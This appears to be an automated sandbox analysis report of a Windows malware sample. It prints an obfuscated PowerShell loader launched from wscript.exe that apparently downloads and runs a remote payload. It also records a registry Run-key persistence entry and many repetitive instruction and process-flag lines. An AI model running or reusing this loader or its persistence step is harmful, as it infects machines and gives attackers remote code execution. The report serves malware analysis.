              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Horrify; function Uprouse15($Fastigiate){$Bovate=4;do{$Cataracted+=$Fastigiate[$Bovate];$Bovate+=5;$Preciosities=Format-List} until(!$Fastigiate[$Bovate])$Cataracted}function Testvrktjer($Pericemental){ .($Unplutocratically) ($Pericemental)}$Tagdkker=Uprouse15 ' HusnUdboe Flltregu.,lnsw';$Tagdkker+=Uprouse15 'tersEGrabBNo.aCC.ckLHjteISuprE AndnRenlT';$Rootfast=Uprouse15 'I baM SrsoAwonzU.deiA.rel enslKonta rio/';$Bovatendskudsstning=Uprouse15 'In lTSekulUndesprec1 R c2';$Matricides=' Iko[H isNperie ProT Til.E ems Yane ugtrHjerV ChoIAftecD,taeCoagpChifoServiLevenSkaltEudamPolyAGastNCardaSi kG Ap.eBrutrBuli]Beds: Tan:K losFesteSquiC avpU BomrId oI coptRecoYKnhjpHa eRRa,eo VitT RanO ntCSu sOTerslHepa=opsl$Kns.bDe.oOBankVJow a HygtFo sE KltNEntodAfs,Sre.uKLeftUFormDOranSSquasSorttRealNGalliGiv NMicrG';$Rootfast+=Uprouse15 ' Bri5ad i.Atro0St.k For(hoveWSelviC rcnNin.dLogaoAmniwTri sMetr klatN ArcTGurg Bue1 hri0po d.Ki o0 in;bo d vbniWUntui CounPeri6Capo4Sa e;Va p S,rix wa6Sca 4Mave;peer skar Nurv ko:Tra 1 Cry3over4town.Fors0men.)Edel SumGButieLem c UdskDiaroAlcm/ Van2Ti s0 ,be1,etr0Refl0Gang1Gl t0 Syt1 Sub AlcF SpoiUnder Ab eTy efDobboH.arxInbo/Semi1Si.u3Prem4,oni.M.zu0';$Hydroida=Uprouse15 'SchiuNonfs BibeRiveRMeta-InhaaArtsgUnswegrooN Rect';$Efterabelserne174=Uprouse15 'PolyhKravtStyrtAfrep Sp.sMarx:F re/Regn/ JosoTagdo G drStreiMe.og.anaiSeminIn xaRudslBleru ,edsConceMonadTyro. vivcDagpoPl dm Cre/I.dtln neodemirFo sdPalo/SokkRGenmeSarci ,ramUdmea Pl gFartiArmin agteMoi..BovnpLab rAktim';$Smreplsen78=Uprouse15 ' Apo>';$Unplutocratically=Uprouse15 'StakI CofeSvovX';$Fodboldes='Sygevarsler';$Barakkens='\Sammenbinder.Moe';Testvrktjer (Uprouse15 ' Pri$HjergVeltlmonoOK,rsbUdsea StelAsja:Lo tA.forNTffenG lvU Astl OraO ilISpladHuj = elg$FaguESiniNDetav ase:IdenAHjfoPk.shP Un,DZe,haTommtStilAT an+dyka$Ca bB ysiA angrpremaB nekAntiKSl nEBu.lN unsS');Testvrktjer (Uprouse15 ' gho$WildGEntrLMi eo Saib VenaSmaaLD.lu:Sni.sRadiPPhonI geaSD moeMu iPUnsul T tiIschGE,trtAish1 Fri5 dfo=unod$ Ud EBaudFCongtB,steTaklREnspA Norb Anae HveLUdfas yntEImp R LusNWashEIsil1 Opt7fo,e4Vi a.knalsI,teP EpilB,lliAncytKkke(Tant$SyntSUrinm S.cR Bate Ko,p agbl SeaSRygme Miln Ch.7Triu8Pa i)');Testvrktjer (Uprouse15 $Matricides);$Efterabelserne174=$Spisepligt15[0];$Bodgery=(Uprouse15 ' Inq$Om,igjackLCacoOBlisBUdklA uinLFo.s:Ani uLudvnUdhuMPel,aGastsAcalTPassE inRSp cfS.aau A,kLRegn=ProsnKoekEAmerwAfso-Ho ooPeptBLangJ CryEMat cTeleT Co To lsRec yL geS UnuTSkygesuprM ork. Rip$Fri tcoc a ewaGBrdrDAlulK TafK PosEPne r');Testvrktjer ($Bodgery);Testvrktjer (Uprouse15 'Tyfo$Mou UAr,inIntemBeviaM nisRod,tKimbeTimerUngrf eeuVitalOver.BoflHSeaseM craN.grdTilgeskibrChe.sD el[ Unf$ MurH,hefyBadidNov rM xioJo siReped Ek,aHome]Mic =Dupl$Ls,eRUdsko aaodhaitAnsafSkinaTrefsMoist');$Saaede=Uprouse15 ' For$ BraUTegnn Benmn nva .tesHandt,edre EnsrU frfBestu.xillBjrg.BaiJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF936860988 push E95AFCD0h; ret 3_2_00007FF9368609C9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF9368651F5 push eax; ret 3_2_00007FF936865241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF9368691FA push eax; ret 3_2_00007FF936869251
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FF936865242 push eax; ret 3_2_00007FF936865241
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F288C push ebx; retf 6_2_088F288D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F4A86 push 4D6A6190h; iretd 6_2_088F4A8B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F2CBE push ebx; iretd 6_2_088F2CC5
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F0E64 push esi; retf 6_2_088F0E65
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F1D85 push cs; retf 6_2_088F1D94
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F4BC1 push 49B4C2E3h; ret 6_2_088F4BC6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F39DC push esi; ret 6_2_088F3A32
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F251A push ecx; retf 6_2_088F2541
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F074C push ebx; ret 6_2_088F074F
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F2B41 push ss; ret 6_2_088F2B44
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_088F4B7A push FFFFFFDAh; ret 6_2_088F4B7D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04260E64 push esi; retf 15_2_04260E65
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04262CBE push ebx; iretd 15_2_04262CC5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04264A86 push 4D6A6190h; iretd 15_2_04264A8B
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0426288C push ebx; retf 15_2_0426288D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0426251A push ecx; retf 15_2_04262541
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04264B7A push FFFFFFDAh; ret 15_2_04264B7D
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04262B41 push ss; ret 15_2_04262B44
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_0426074C push ebx; ret 15_2_0426074F
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04261D85 push cs; retf 15_2_04261D94
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_04264BC1 push 49B4C2E3h; ret 15_2_04264BC6
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_042639DC push esi; ret 15_2_04263A32
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20AB29E0 push ecx; ret 15_2_20AB3CA5
              Source: C:\Windows\SysWOW64\msiexec.exeCode function: 15_2_20AB3C90 push ecx; ret 15_2_20AB3CA5
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LitteraturlistesJump to behavior
              Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run LitteraturlistesJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
